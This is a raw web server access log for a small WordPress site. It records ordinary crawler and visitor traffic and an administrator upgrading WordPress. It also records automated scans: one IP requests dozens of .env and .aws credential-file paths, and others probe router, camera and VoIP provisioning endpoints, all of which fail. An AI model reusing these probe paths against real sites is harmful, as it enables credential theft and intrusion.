52.167.144.21 - - [14/Jan/2026:15:49:30 +0800] "GET / HTTP/1.1" 200 35138 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [14/Jan/2026:15:54:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768377285.3785560131072998046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
78.153.140.151 - - [14/Jan/2026:15:54:45 +0800] "GET /.env HTTP/1.1" 404 31050 "-" "More Firefox 2.0.0.3 user agents strings -->>"
78.153.140.151 - - [14/Jan/2026:15:54:47 +0800] "GET /.env.private HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17"
78.153.140.151 - - [14/Jan/2026:15:54:49 +0800] "GET /.env-ids.env HTTP/1.1" 404 31050 "-" "Mozilla/4.0 (compatible;MSIE 5.5; Windows 98)"
78.153.140.151 - - [14/Jan/2026:15:54:51 +0800] "GET /.env-preview HTTP/1.1" 404 31050 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CPDTDF)"
78.153.140.151 - - [14/Jan/2026:15:54:53 +0800] "GET /.env-ids.log HTTP/1.1" 404 31050 "-" "Opera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00"
78.153.140.151 - - [14/Jan/2026:15:54:56 +0800] "GET /.env-top.env HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS; en-en) AppleWebKit/412 (KHTML, like Gecko) Safari/412"
78.153.140.151 - - [14/Jan/2026:15:54:58 +0800] "GET /.env-iis.log HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36"
78.153.140.151 - - [14/Jan/2026:15:55:01 +0800] "GET /.env_private HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; EIE10;ENUSMCM)"
78.153.140.151 - - [14/Jan/2026:15:55:03 +0800] "GET /.env.env.bak HTTP/1.1" 404 31050 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)"
78.153.140.151 - - [14/Jan/2026:15:55:05 +0800] "GET /.env-scripts HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36 OPR/16.0.1196.62"
78.153.140.151 - - [14/Jan/2026:15:55:07 +0800] "GET /.env-secrets HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36"
78.153.140.151 - - [14/Jan/2026:15:55:30 +0800] "GET /.env-profile HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"
78.153.140.151 - - [14/Jan/2026:15:55:32 +0800] "GET /.env-project HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0"
78.153.140.151 - - [14/Jan/2026:15:55:39 +0800] "GET /.env-bot.env HTTP/1.1" 404 31050 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; InfoPath.1; Hotbar 11.0.78.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
78.153.140.151 - - [14/Jan/2026:15:55:43 +0800] "GET /.env.sandbox HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36"
78.153.140.151 - - [14/Jan/2026:15:55:45 +0800] "GET /.aws/secrets/ HTTP/1.1" 404 31050 "-" "Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1"
36.133.115.36 - - [14/Jan/2026:15:55:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768377347.5111770629882812500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
78.153.140.151 - - [14/Jan/2026:15:55:47 +0800] "GET /.aws/policies HTTP/1.1" 404 31050 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; IT) Opera 8.0"
78.153.140.151 - - [14/Jan/2026:15:55:49 +0800] "GET /.aws/cognito/ HTTP/1.1" 404 31050 "-" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.14"
78.153.140.151 - - [14/Jan/2026:15:55:51 +0800] "GET /.aws/api-keys HTTP/1.1" 404 31050 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
78.153.140.151 - - [14/Jan/2026:15:55:53 +0800] "GET /wp-config.aws HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Linux; U; Android 4.2.2; fi-fi; GT-P5110 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30"
78.153.140.151 - - [14/Jan/2026:15:55:55 +0800] "GET /config/aws.py HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36"
78.153.140.151 - - [14/Jan/2026:15:55:57 +0800] "GET /.aws/keypairs HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5"
78.153.140.151 - - [14/Jan/2026:15:56:00 +0800] "GET /aws_keys.json HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.815.0 Safari/535.1"
78.153.140.151 - - [14/Jan/2026:15:56:02 +0800] "GET /.aws/glacier/ HTTP/1.1" 404 31050 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0"
36.133.115.36 - - [14/Jan/2026:15:58:39 +0800] "POST /wp-cron.php?doing_wp_cron=1768377519.1736519336700439453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [14/Jan/2026:15:58:39 +0800] "GET / HTTP/1.1" 200 34700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Jan/2026:16:11:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768378296.1063179969787597656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
51.159.93.65 - - [14/Jan/2026:16:11:36 +0800] "GET / HTTP/1.1" 200 34700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
36.133.115.36 - - [14/Jan/2026:16:13:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768378381.2825338840484619140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
52.167.144.197 - - [14/Jan/2026:16:13:01 +0800] "GET /?s= HTTP/1.1" 200 19657 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [14/Jan/2026:16:13:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768378438.1983799934387207031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
51.159.93.65 - - [14/Jan/2026:16:13:58 +0800] "GET /HNAP1 HTTP/1.1" 301 5 "http://36.133.115.36:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
51.159.93.65 - - [14/Jan/2026:16:14:00 +0800] "GET /HNAP1 HTTP/1.1" 404 8928 "http://36.133.115.36:80/HNAP1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
51.159.93.65 - - [14/Jan/2026:16:14:03 +0800] "POST /onvif/device_service HTTP/1.1" 404 8923 "http://36.133.115.36:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
51.159.93.65 - - [14/Jan/2026:16:14:04 +0800] "GET /PSIA/index HTTP/1.1" 301 5 "http://36.133.115.36:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
51.159.93.65 - - [14/Jan/2026:16:14:06 +0800] "GET /PSIA/index HTTP/1.1" 404 8929 "http://36.133.115.36:80/PSIA/index" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
36.133.115.36 - - [14/Jan/2026:16:20:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768378822.8229329586029052734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.111.247.139 - - [14/Jan/2026:16:20:22 +0800] "GET /provisioning/000000000000.cfg HTTP/1.1" 404 8923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
120.4.77.182 - - [14/Jan/2026:16:27:01 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 18879 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
120.227.87.163 - - [14/Jan/2026:16:27:01 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 18879 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
123.233.228.124 - - [14/Jan/2026:16:27:04 +0800] "GET /contacts/ HTTP/1.1" 200 18879 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.143.36.183 - - [14/Jan/2026:16:27:05 +0800] "GET /contacts/ HTTP/1.1" 200 18879 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
223.77.124.63 - - [14/Jan/2026:16:27:05 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 18879 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
121.29.51.28 - - [14/Jan/2026:16:45:12 +0800] "GET / HTTP/1.1" 200 35138 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27"
36.133.115.36 - - [14/Jan/2026:16:50:01 +0800] "POST /wp-cron.php?doing_wp_cron=1768380600.9721000194549560546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [14/Jan/2026:16:50:01 +0800] "GET / HTTP/1.1" 200 34700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [14/Jan/2026:16:52:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768380765.4885399341583251953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
121.29.51.28 - - [14/Jan/2026:16:52:45 +0800] "GET / HTTP/1.1" 200 34700 "-" "Mozilla/5.0 (Linux; Android 8.0; STF-AL00 Build/HUAWEISTF-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/48.0.2564.116 Mobile Safari/537.36 T7/10.10 baiduboxapp/10.10.0.12 (Baidu; P1 8.0.0)"
36.133.115.36 - - [14/Jan/2026:17:00:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768381255.7080349922180175781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
43.130.40.120 - - [14/Jan/2026:17:00:55 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.40.120 - - [14/Jan/2026:17:00:57 +0800] "GET / HTTP/1.1" 200 34700 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
14.108.233.156 - - [14/Jan/2026:17:12:48 +0800] "GET / HTTP/1.1" 200 35138 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
36.133.115.36 - - [14/Jan/2026:17:12:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768381971.1522459983825683593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
14.108.233.156 - - [14/Jan/2026:17:12:51 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=4 HTTP/1.1" 200 2573 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:12:51 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2002 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:12:51 +0800] "GET /wp-content/uploads/2026/01/1768276119-qizhoujiagong_Slider_3840%C3%972160_20260113-scaled.webp HTTP/1.1" 200 131696 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:12:59 +0800] "GET /wp-content/uploads/2025/12/1765268955-qizhou_Slider1_3840%C3%972160_20251210-scaled-50x100.webp HTTP/1.1" 200 1812 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:04 +0800] "GET /wp-admin/ HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:05 +0800] "GET /wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1 HTTP/1.1" 200 2774 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:08 +0800] "POST /wp-login.php HTTP/1.1" 302 5 "http://cqqizhou.com/wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:13 +0800] "GET /wp-admin/ HTTP/1.1" 200 60273 "http://cqqizhou.com/wp-login.php?redirect_to=http%3A%2F%2Fcqqizhou.com%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:13 +0800] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,site-health,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,media-views,wp-color-picker,editor-buttons,wp-auth-check&ver=6.8.3 HTTP/1.1" 200 115557 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:13 +0800] "GET /wp-admin/load-scripts.php?c=0&load%5Bchunk_0%5D=jquery-core,jquery-migrate,utils,wp-dom-ready,wp-hooks&ver=6.8.3 HTTP/1.1" 200 36655 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:13 +0800] "GET /wp-admin/load-scripts.php?c=0&load%5Bchunk_0%5D=hoverIntent&ver=6.8.3 HTTP/1.1" 200 719 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:27 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:31 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 47 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:32 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 32 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:59 +0800] "GET /wp-admin/update-core.php HTTP/1.1" 200 51835 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:13:59 +0800] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5Bchunk_1%5D=,site-icon,l10n,buttons,media-views,wp-color-picker,editor-buttons&ver=6.8.3 HTTP/1.1" 200 114094 "http://cqqizhou.com/wp-admin/update-core.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
36.133.115.36 - - [14/Jan/2026:17:14:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768382049.0712370872497558593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
14.108.233.156 - - [14/Jan/2026:17:14:25 +0800] "POST /wp-admin/update-core.php?action=do-core-upgrade HTTP/1.1" 200 50246 "http://cqqizhou.com/wp-admin/update-core.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
36.133.115.36 - - [14/Jan/2026:17:16:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768382200.5120339393615722656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
23.132.164.78 - - [14/Jan/2026:17:16:40 +0800] "GET /.env HTTP/1.1" 404 8921 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.115.36 - - [14/Jan/2026:17:16:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768382208.2716159820556640625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
23.132.164.78 - - [14/Jan/2026:17:16:48 +0800] "POST / HTTP/1.1" 200 34700 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
36.133.115.36 - - [14/Jan/2026:17:23:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768382623.6251249313354492187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.111.247.139 - - [14/Jan/2026:17:23:43 +0800] "GET /provisioning/polycom/000000000000.cfg HTTP/1.1" 404 8923 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [14/Jan/2026:17:29:57 +0800] "POST /wp-cron.php?doing_wp_cron=1768382997.4185819625854492187500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
14.108.233.156 - - [14/Jan/2026:17:29:57 +0800] "GET /wp-admin/update-core.php?action=do-core-upgrade HTTP/1.1" 302 5 "http://cqqizhou.com/wp-admin/update-core.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
36.133.115.36 - - [14/Jan/2026:17:29:57 +0800] "POST /wp-cron.php?doing_wp_cron=1768382997.8012011051177978515625 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
14.108.233.156 - - [14/Jan/2026:17:29:57 +0800] "GET /wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-core-upgrade HTTP/1.1" 200 695 "http://cqqizhou.com/wp-admin/update-core.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:29:59 +0800] "GET /wp-admin/upgrade.php?step=1&backto=%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-core-upgrade HTTP/1.1" 200 559 "http://cqqizhou.com/wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-core-upgrade" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:05 +0800] "GET /wp-admin/update-core.php?action=do-core-upgrade HTTP/1.1" 403 1219 "http://cqqizhou.com/wp-admin/upgrade.php?step=1&backto=%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-core-upgrade" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:08 +0800] "GET /wp-admin/upgrade.php?step=1&backto=%2Fwp-admin%2Fupdate-core.php%3Faction%3Ddo-core-upgrade HTTP/1.1" 200 549 "http://cqqizhou.com/wp-admin/update-core.php?action=do-core-upgrade" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:13 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=4 HTTP/1.1" 200 2573 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:13 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2002 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:25 +0800] "GET /wp-admin/ HTTP/1.1" 200 83896 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:25 +0800] "GET /wp-admin/load-scripts.php?c=0&load%5Bchunk_0%5D=jquery-core,jquery-migrate,utils,wp-dom-ready,wp-hooks&ver=6.9 HTTP/1.1" 200 36948 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:25 +0800] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,site-health,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,media-views,wp-color-picker,editor-buttons,wp-auth-check,wp-components,wp-commands&ver=6.9 HTTP/1.1" 200 132502 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:25 +0800] "GET /wp-admin/load-scripts.php?c=0&load%5Bchunk_0%5D=hoverIntent&ver=6.9 HTTP/1.1" 200 719 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:26 +0800] "GET /wp-admin/admin-ajax.php?action=wp-compression-test&test=1&_ajax_nonce=98a675ae36&1768383019157 HTTP/1.1" 200 586 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:26 +0800] "GET /wp-admin/admin-ajax.php?action=wp-compression-test&test=no&_ajax_nonce=98a675ae36&1768383019869 HTTP/1.1" 200 32 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:29 +0800] "GET /wp-admin/ HTTP/1.1" 200 83398 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
14.108.233.156 - - [14/Jan/2026:17:30:33 +0800] "GET /wp-admin/update-core.php HTTP/1.1" 200 74390 "http://cqqizhou.com/wp-admin/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36 Edg/143.0.0.0"
